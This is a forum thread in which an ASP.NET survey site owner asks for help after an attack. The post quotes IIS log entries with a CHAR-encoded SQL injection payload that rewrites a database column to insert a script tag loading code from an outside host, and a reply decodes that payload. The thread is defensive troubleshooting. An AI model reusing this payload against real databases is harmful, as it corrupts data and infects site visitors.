We have a survey site that was apparently attacked. The symptoms are identical to what was described on the following page on this site: XSS Attack on the ASP.NET Website.
I found multiple entries in our IIS logs that included the malicious code:
< / title> < script src = http : // google-stats49.info/ur.php >.
Here is an example of the value of the cs-uri-query field for one of the IIS log entries.
surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
I don't understand how the above code works but apparently this is what is being sent in a query string to corrupt columns in our database tables. We have shut down our site for the time being. We can remove the scripts from the database but that doesn't prevent it from being corrupted again when we bring the site back online.
Does anyone have any suggestions on how to prevent this from happening?
CHAR(n)
is a TSQL function that turns an int into a ASCII character. This is what the above sample contains:</title><script src=http://google-stats50.info/ur.php></script>
, so try it out:print char(60)+char(47)+char(116)+char(105)+char(116)+char(108) +char(101)+char(62)+char(60)+char(115)+char(99)+char(114) +char(105)+char(112)+char(116)+char(32)+char(115)+char(114) +char(99)+char(61)+char(104)+char(116)+char(116)+char(112) +char(58)+char(47)+char(47)+char(103)+char(111)+char(111) +char(103)+char(108)+char(101)+char(45)+char(115)+char(116) +char(97)+char(116)+char(115)+char(53)+'...'
– KM.